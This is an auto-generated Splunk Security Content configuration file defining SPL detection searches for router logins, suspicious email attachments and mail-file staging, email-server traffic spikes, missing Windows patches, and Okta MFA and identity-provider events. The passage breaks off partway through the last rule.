#############
# Automatically generated by generator.py in splunk/security_content
# On Date: 2024-04-17T22:08:10 UTC
# Author: Splunk Threat Research Team - Splunk
# Contact: research@splunk.com
#############

### ESCU DETECTIONS ###

[ESCU - Detect New Login Attempts to Routers - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The search queries the authentication logs for assets that are categorized as routers in the ES Assets and Identity Framework, to identify connections that have not been seen before in the last 30 days.
action.escu.mappings = {"cis20": ["CIS 13"], "nist": ["DE.CM"]}
action.escu.data_models = ["Authentication"]
action.escu.eli5 = The search queries the authentication logs for assets that are categorized as routers in the ES Assets and Identity Framework, to identify connections that have not been seen before in the last 30 days.
action.escu.how_to_implement = To successfully implement this search, you must ensure the network router devices are categorized as "router" in the Assets and Identity table. You must also populate the Authentication data model with logs related to users authenticating to routing infrastructure.
action.escu.known_false_positives = Legitimate router connections may appear as new connections
action.escu.creation_date = 2017-09-12
action.escu.modification_date = 2017-09-12
action.escu.confidence = high
action.escu.full_search_name = ESCU - Detect New Login Attempts to Routers - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Router and Infrastructure Security"]
action.risk = 1
action.risk.param._risk_message = tbd
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - Detect New Login Attempts to Routers - Rule
action.correlationsearch.annotations = {"analytic_story": ["Router and Infrastructure Security"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The search queries the authentication logs for assets that are categorized as routers in the ES Assets and Identity Framework, to identify connections that have not been seen before in the last 30 days.
action.notable.param.rule_title = Detect New Login Attempts to Routers
action.notable.param.security_domain = network
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count earliest(_time) as earliest latest(_time) as latest from datamodel=Authentication where Authentication.dest_category=router by Authentication.dest Authentication.user | eval isOutlier=if(earliest >= relative_time(now(), "-30d@d"), 1, 0) | where isOutlier=1 | `security_content_ctime(earliest)` | `security_content_ctime(latest)` | `drop_dm_object_name("Authentication")` | `detect_new_login_attempts_to_routers_filter`

[ESCU - Detect Risky SPL using Pretrained ML Model - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following analytic uses a pretrained machine learning text classifier to detect potentially risky commands. The model is trained independently and then the model file is packaged within ESCU for usage. A command is deemed risky based on the presence of certain trigger keywords, along with the context and the role of the user (please see references). The model uses custom features to predict whether a SPL is risky using text classification. The model takes as input the command text, user and search type and outputs a risk score between [0,1]. A high score indicates a higher likelihood of a command being risky. This model is on-prem only.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059"], "nist": ["DE.AE"]}
action.escu.data_models = ["Splunk_Audit"]
action.escu.eli5 = The following analytic uses a pretrained machine learning text classifier to detect potentially risky commands. The model is trained independently and then the model file is packaged within ESCU for usage. A command is deemed risky based on the presence of certain trigger keywords, along with the context and the role of the user (please see references). The model uses custom features to predict whether a SPL is risky using text classification. The model takes as input the command text, user and search type and outputs a risk score between [0,1]. A high score indicates a higher likelihood of a command being risky. This model is on-prem only.
action.escu.how_to_implement = This detection depends on the MLTK app which can be found here - https://splunkbase.splunk.com/app/2890/ and the Splunk Audit datamodel which can be found here - https://splunkbase.splunk.com/app/1621/. Additionally, you need to be ingesting logs which include Search_Activity.search, Search_Activity.user, Search_Activity.search_type from your endpoints. The risk score threshold should be adjusted based on the environment. The detection uses a custom MLTK model, hence a few more steps are needed for deployment, as outlined here - https://gist.github.com/ksharad-splunk/be2a62227966049047f5e5c4f2adcabb.
action.escu.known_false_positives = False positives may be present if suspicious behavior is observed, as determined by frequent usage of risky keywords.
action.escu.creation_date = 2022-06-16
action.escu.modification_date = 2022-06-16
action.escu.confidence = high
action.escu.full_search_name = ESCU - Detect Risky SPL using Pretrained ML Model - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Splunk Vulnerabilities"]
action.risk = 1
action.risk.param._risk_message = A potentially risky Splunk command has been run by $user$, kindly review.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 20}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - Detect Risky SPL using Pretrained ML Model - Rule
action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 40, "cve": ["CVE-2022-32154"], "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Splunk_Audit.Search_Activity where Search_Activity.search_type=adhoc Search_Activity.user!=splunk-system-user by Search_Activity.search Search_Activity.user Search_Activity.search_type | eval spl_text = 'Search_Activity.search'. " " .'Search_Activity.user'. " " .'Search_Activity.search_type' | dedup spl_text | apply risky_spl_pre_trained_model | where risk_score > 0.5 | `drop_dm_object_name(Search_Activity)` | table search, user, search_type, risk_score | `detect_risky_spl_using_pretrained_ml_model_filter`

[ESCU - Email Attachments With Lots Of Spaces - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. Attackers often use spaces as a means to obfuscate an attachment's file extension. This search looks for messages with email attachments that have many spaces within the file names.
action.escu.mappings = {"cis20": ["CIS 13"], "nist": ["DE.AE"]}
action.escu.data_models = ["Email"]
action.escu.eli5 = Attackers often use spaces as a means to obfuscate an attachment's file extension. This search looks for messages with email attachments that have many spaces within the file names.
action.escu.how_to_implement = You need to ingest data from emails. Specifically, the sender's address and the file names of any attachments must be mapped to the Email data model. The threshold ratio is set to 10%, but this value can be configured to suit each environment. \
**Splunk Phantom Playbook Integration**\
If Splunk Phantom is also configured in your environment, a playbook called "Suspicious Email Attachment Investigate and Delete" can be configured to run when any results are found by this detection search. To use this integration, install the Phantom App for Splunk `https://splunkbase.splunk.com/app/3411/` and add the correct hostname to the "Phantom Instance" field in the Adaptive Response Actions when configuring this detection search. The notable event will be sent to Phantom and the playbook will gather further information about the file attachment and its network behaviors. If Phantom finds malicious behavior and an analyst approves of the results, the email will be deleted from the user's inbox.
action.escu.known_false_positives = None at this time
action.escu.creation_date = 2023-04-14
action.escu.modification_date = 2023-04-14
action.escu.confidence = high
action.escu.full_search_name = ESCU - Email Attachments With Lots Of Spaces - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Data Destruction", "Emotet Malware DHS Report TA18-201A", "Hermetic Wiper", "Suspicious Emails"]
action.risk = 1
action.risk.param._risk_message = tbd
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - Email Attachments With Lots Of Spaces - Rule
action.correlationsearch.annotations = {"analytic_story": ["Data Destruction", "Emotet Malware DHS Report TA18-201A", "Hermetic Wiper", "Suspicious Emails"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count values(All_Email.recipient) as recipient_address min(_time) as firstTime max(_time) as lastTime from datamodel=Email where All_Email.file_name="*" by All_Email.src_user, All_Email.file_name All_Email.message_id | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `drop_dm_object_name("All_Email")` | eval space_ratio = (mvcount(split(file_name," "))-1)/len(file_name) | search space_ratio >= 0.1 | rex field=recipient_address "(?<recipient_user>.*)@" | `email_attachments_with_lots_of_spaces_filter`

[ESCU - Email files written outside of the Outlook directory - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The search looks at the change-analysis data model and detects email files created outside the normal Outlook directory.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1114", "T1114.001"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The search looks at the change-analysis data model and detects email files created outside the normal Outlook directory.
action.escu.how_to_implement = To successfully implement this search, you must be ingesting data that records the file-system activity from your hosts to populate the Endpoint.Filesystem data model node. This is typically populated via an endpoint detection-and-response product, such as Carbon Black, or by other endpoint data sources, such as Sysmon. The data used for this search is typically generated via logs that report file-system reads and writes.
action.escu.known_false_positives = Administrators and users sometimes prefer backing up their email data by moving the email files into a different folder. These attempts will be detected by the search.
action.escu.creation_date = 2020-07-21
action.escu.modification_date = 2020-07-21
action.escu.confidence = high
action.escu.full_search_name = ESCU - Email files written outside of the Outlook directory - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Collection and Staging"]
action.risk = 1
action.risk.param._risk_message = tbd
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - Email files written outside of the Outlook directory - Rule
action.correlationsearch.annotations = {"analytic_story": ["Collection and Staging"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1114", "T1114.001"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The search looks at the change-analysis data model and detects email files created outside the normal Outlook directory.
action.notable.param.rule_title = Email files written outside of the Outlook directory
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count values(Filesystem.file_path) as file_path min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Filesystem where (Filesystem.file_name=*.pst OR Filesystem.file_name=*.ost) Filesystem.file_path != "C:\\Users\\*\\My Documents\\Outlook Files\\*" Filesystem.file_path!="C:\\Users\\*\\AppData\\Local\\Microsoft\\Outlook*" by Filesystem.action Filesystem.process_id Filesystem.file_name Filesystem.dest | `drop_dm_object_name("Filesystem")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `email_files_written_outside_of_the_outlook_directory_filter`

[ESCU - Email servers sending high volume traffic to hosts - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search looks for an increase of data transfers from your email server to your clients. This could be indicative of a malicious actor collecting data using your email server.
action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1114", "T1114.002"], "nist": ["DE.AE"]}
action.escu.data_models = ["Network_Traffic"]
action.escu.eli5 = This search looks for an increase of data transfers from your email server to your clients. This could be indicative of a malicious actor collecting data using your email server.
action.escu.how_to_implement = This search requires you to be ingesting your network traffic and populating the Network_Traffic data model. Your email servers must be categorized as "email_server" for the search to work, as well. You may need to adjust the deviation_threshold and minimum_data_samples values based on the network traffic in your environment. The "deviation_threshold" field is a multiplying factor to control how much variation you're willing to tolerate. The "minimum_data_samples" field is the minimum number of connections of data samples required for the statistic to be valid.
action.escu.known_false_positives = The false-positive rate will vary based on how you set the deviation_threshold and data_samples values. Our recommendation is to adjust these values based on your network traffic to and from your email servers.
action.escu.creation_date = 2020-07-21
action.escu.modification_date = 2020-07-21
action.escu.confidence = high
action.escu.full_search_name = ESCU - Email servers sending high volume traffic to hosts - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Collection and Staging", "HAFNIUM Group"]
action.risk = 1
action.risk.param._risk_message = tbd
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - Email servers sending high volume traffic to hosts - Rule
action.correlationsearch.annotations = {"analytic_story": ["Collection and Staging", "HAFNIUM Group"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1114", "T1114.002"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` sum(All_Traffic.bytes_out) as bytes_out from datamodel=Network_Traffic where All_Traffic.src_category=email_server by All_Traffic.dest_ip _time span=1d | `drop_dm_object_name("All_Traffic")` | eventstats avg(bytes_out) as avg_bytes_out stdev(bytes_out) as stdev_bytes_out | eventstats count as num_data_samples avg(eval(if(_time < relative_time(now(), "@d"), bytes_out, null))) as per_source_avg_bytes_out stdev(eval(if(_time < relative_time(now(), "@d"), bytes_out, null))) as per_source_stdev_bytes_out by dest_ip | eval minimum_data_samples = 4, deviation_threshold = 3 | where num_data_samples >= minimum_data_samples AND bytes_out > (avg_bytes_out + (deviation_threshold * stdev_bytes_out)) AND bytes_out > (per_source_avg_bytes_out + (deviation_threshold * per_source_stdev_bytes_out)) AND _time >= relative_time(now(), "@d") | eval num_standard_deviations_away_from_server_average = round(abs(bytes_out - avg_bytes_out) / stdev_bytes_out, 2), num_standard_deviations_away_from_client_average = round(abs(bytes_out - per_source_avg_bytes_out) / per_source_stdev_bytes_out, 2) | table dest_ip, _time, bytes_out, avg_bytes_out, per_source_avg_bytes_out, num_standard_deviations_away_from_server_average, num_standard_deviations_away_from_client_average | `email_servers_sending_high_volume_traffic_to_hosts_filter`

[ESCU - Monitor Email For Brand Abuse - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search looks for emails claiming to be sent from a domain similar to one that you want to have monitored for abuse.
action.escu.mappings = {"cis20": ["CIS 13"], "nist": ["DE.CM"]}
action.escu.data_models = ["Email"]
action.escu.eli5 = This search looks for emails claiming to be sent from a domain similar to one that you want to have monitored for abuse.
action.escu.how_to_implement = You need to ingest email header data. Specifically, the sender's address (src_user) must be populated. You also need to have run the search "ESCU - DNSTwist Domain Names", which creates the permutations of the domain that will be checked for.
action.escu.known_false_positives = None at this time
action.escu.creation_date = 2018-01-05
action.escu.modification_date = 2018-01-05
action.escu.confidence = high
action.escu.full_search_name = ESCU - Monitor Email For Brand Abuse - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Brand Monitoring", "Suspicious Emails"]
action.risk = 1
action.risk.param._risk_message = tbd
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - Monitor Email For Brand Abuse - Rule
action.correlationsearch.annotations = {"analytic_story": ["Brand Monitoring", "Suspicious Emails"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search looks for emails claiming to be sent from a domain similar to one that you want to have monitored for abuse.
action.notable.param.rule_title = Monitor Email For Brand Abuse
action.notable.param.security_domain = network
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` values(All_Email.recipient) as recipients, min(_time) as firstTime, max(_time) as lastTime from datamodel=Email by All_Email.src_user, All_Email.message_id | `drop_dm_object_name("All_Email")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | eval temp=split(src_user, "@") | eval email_domain=mvindex(temp, 1) | lookup update=true brandMonitoring_lookup domain as email_domain OUTPUT domain_abuse | search domain_abuse=true | table message_id, src_user, email_domain, recipients, firstTime, lastTime | `monitor_email_for_brand_abuse_filter`

[ESCU - No Windows Updates in a time frame - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search looks for Windows endpoints that have not generated an event indicating a successful Windows update in the last 60 days. Windows updates are typically released monthly and applied shortly thereafter. An endpoint that has not successfully applied an update in this time frame indicates the endpoint is not regularly being patched for some reason.
action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]}
action.escu.data_models = ["Updates"]
action.escu.eli5 = This search looks for Windows endpoints that have not generated an event indicating a successful Windows update in the last 60 days. Windows updates are typically released monthly and applied shortly thereafter. An endpoint that has not successfully applied an update in this time frame indicates the endpoint is not regularly being patched for some reason.
action.escu.how_to_implement = To successfully implement this search, it requires that the 'Update' data model is being populated. This can be accomplished by ingesting Windows events or the Windows Update log via a universal forwarder on the Windows endpoints you wish to monitor. The Windows add-on should also be installed and configured to properly parse Windows events in Splunk. There may be other data sources which can populate this data model, including vulnerability management systems.
action.escu.known_false_positives = None identified
action.escu.creation_date = 2017-09-15
action.escu.modification_date = 2017-09-15
action.escu.confidence = high
action.escu.full_search_name = ESCU - No Windows Updates in a time frame - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Monitor for Updates"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - No Windows Updates in a time frame - Rule
action.correlationsearch.annotations = {"analytic_story": ["Monitor for Updates"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` max(_time) as lastTime from datamodel=Updates where Updates.status=Installed Updates.vendor_product="Microsoft Windows" by Updates.dest Updates.status Updates.vendor_product | rename Updates.dest as Host | rename Updates.status as "Update Status" | rename Updates.vendor_product as Product | eval isOutlier=if(lastTime <= relative_time(now(), "-60d@d"), 1, 0) | `security_content_ctime(lastTime)` | search isOutlier=1 | rename lastTime as "Last Update Time" | table Host, "Update Status", Product, "Last Update Time" | `no_windows_updates_in_a_time_frame_filter`

[ESCU - Okta Authentication Failed During MFA Challenge - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies an authentication attempt event against an Okta tenant that fails during the Multi-Factor Authentication (MFA) challenge. This detection is written against the Authentication datamodel and we look for specific failed events where the authentication signature is `user.authentication.auth_via_mfa`. This behavior may represent an adversary trying to authenticate with compromised credentials for an account that has multi-factor authentication enabled.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization", "Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1586", "T1586.003", "T1078", "T1078.004", "T1621"], "nist": ["DE.CM"]}
action.escu.data_models = ["Authentication"]
action.escu.eli5 = The following analytic identifies an authentication attempt event against an Okta tenant that fails during the Multi-Factor Authentication (MFA) challenge. This detection is written against the Authentication datamodel and we look for specific failed events where the authentication signature is `user.authentication.auth_via_mfa`. This behavior may represent an adversary trying to authenticate with compromised credentials for an account that has multi-factor authentication enabled.
action.escu.how_to_implement = The analytic leverages Okta OktaIm2 logs to be ingested using the Splunk Add-on for Okta Identity Cloud (https://splunkbase.splunk.com/app/6553).
action.escu.known_false_positives = A user may have accidentally entered the wrong credentials during the MFA challenge. If the user is new to MFA, they may have trouble authenticating. Ensure that the user is aware of the MFA process and has the correct credentials.
action.escu.creation_date = 2024-03-11
action.escu.modification_date = 2024-03-11
action.escu.confidence = high
action.escu.full_search_name = ESCU - Okta Authentication Failed During MFA Challenge - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Okta"]
action.escu.analytic_story = ["Okta Account Takeover"]
action.risk = 1
action.risk.param._risk_message = A user [$user$] has failed to authenticate via MFA from IP Address - [$src$]
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 48}, {"threat_object_field": "src", "threat_object_type": "ip_address"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Okta Authentication Failed During MFA Challenge - Rule
action.correlationsearch.annotations = {"analytic_story": ["Okta Account Takeover"], "cis20": ["CIS 10"], "confidence": 60, "impact": 80, "kill_chain_phases": ["Weaponization", "Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1586", "T1586.003", "T1078", "T1078.004", "T1621"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies an authentication attempt event against an Okta tenant that fails during the Multi-Factor Authentication (MFA) challenge. This detection is written against the Authentication datamodel and we look for specific failed events where the authentication signature is `user.authentication.auth_via_mfa`. This behavior may represent an adversary trying to authenticate with compromised credentials for an account that has multi-factor authentication enabled.
action.notable.param.rule_title = Okta Authentication Failed During MFA Challenge
action.notable.param.security_domain = identity
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime values(Authentication.app) as app values(Authentication.reason) as reason values(Authentication.signature) as signature values(Authentication.method) as method from datamodel=Authentication where Authentication.signature=user.authentication.auth_via_mfa Authentication.action = failure by _time Authentication.src Authentication.user Authentication.dest Authentication.action | `drop_dm_object_name("Authentication")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | iplocation src | `okta_authentication_failed_during_mfa_challenge_filter`

[ESCU - Okta IDP Lifecycle Modifications - Rule]
action.escu = 0
action.escu.enabled = 1
description = This detection identifies modifications to Okta Identity Provider (IDP) lifecycle events, such as creation, activation, deactivation, and deletion of IDP configurations. Monitoring these events is crucial for maintaining the integrity and security of authentication mechanisms within an organization. By detecting unauthorized or anomalous changes, organizations can quickly respond to potential security breaches or misconfigurations, ensuring that their identity management systems remain secure and operational.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.004"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This detection identifies modifications to Okta Identity Provider (IDP) lifecycle events, such as creation, activation, deactivation, and deletion of IDP configurations. Monitoring these events is crucial for maintaining the integrity and security of authentication mechanisms within an organization. By detecting unauthorized or anomalous changes, organizations can quickly respond to potential security breaches or misconfigurations, ensuring that their identity management systems remain secure and operational.
action.escu.how_to_implement = The analytic leverages Okta OktaIm2 logs to be ingested using the Splunk Add-on for Okta Identity Cloud (https://splunkbase.splunk.com/app/6553).
action.escu.known_false_positives = It's possible for legitimate administrative actions or automated processes to trigger this detection, especially if there are bulk modifications to Okta IDP lifecycle events. Review the context of the modification, such as the user making the change and the specific lifecycle event modified, to determine if it aligns with expected behavior.
action.escu.creation_date = 2024-03-14
action.escu.modification_date = 2024-03-14
action.escu.confidence = high
action.escu.full_search_name = ESCU - Okta IDP Lifecycle Modifications - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Okta"]
action.escu.analytic_story = ["Suspicious Okta Activity"]
action.risk = 1
action.risk.param._risk_message = A user [$user$] is attempting IDP lifecycle modification - [$description$] from IP Address - [$src$]
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 81}, {"threat_object_field": "src", "threat_object_type": "ip_address"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Okta IDP Lifecycle Modifications - Rule
action.correlationsearch.annotations = {"analytic_story": ["Suspicious Okta Activity"], "cis20": ["CIS 10"], "confidence": 90, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.004"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `okta` eventType IN ("system.idp.lifecycle.activate","system.idp.lifecycle.create","system.idp.lifecycle.delete","system.idp.lifecycle.deactivate") | stats count min(_time) as firstTime max(_time) as lastTime values(target{}.id) as target_id values(target{}.type) as target_modified by src dest src_user_id user user_agent command description | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `okta_idp_lifecycle_modifications_filter`

[ESCU - Okta MFA Exhaustion Hunt - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies patterns within Okta data to determine the amount of successful and failed pushes. Based on that, eval statements determine a finding of whether this is suspicious or not. The events are within a window of time and may be tuned as needed.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1110"], "nist": ["DE.AE"]}
action.escu.data_models = ["Authentication"]
action.escu.eli5 = The following analytic identifies patterns within Okta data to determine the amount of successful and failed pushes. Based on that, eval statements determine a finding of whether this is suspicious or not. The events are within a window of time and may be tuned as needed.
action.escu.how_to_implement = The analytic leverages Okta OktaIm2 logs to be ingested using the Splunk Add-on for Okta Identity Cloud (https://splunkbase.splunk.com/app/6553).
action.escu.known_false_positives = False positives may be present. Tune Okta and tune the analytic to ensure proper fidelity. Modify risk score as needed.
